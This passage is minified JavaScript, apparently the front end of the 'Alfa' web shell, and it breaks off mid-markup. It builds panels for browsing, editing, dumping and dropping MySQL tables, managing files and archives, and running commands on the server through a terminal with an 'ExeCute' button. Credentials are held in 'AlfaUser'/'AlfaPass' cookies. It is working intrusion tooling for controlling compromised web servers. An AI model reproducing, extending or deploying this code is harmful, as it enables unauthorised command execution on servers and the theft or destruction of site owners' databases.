alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" 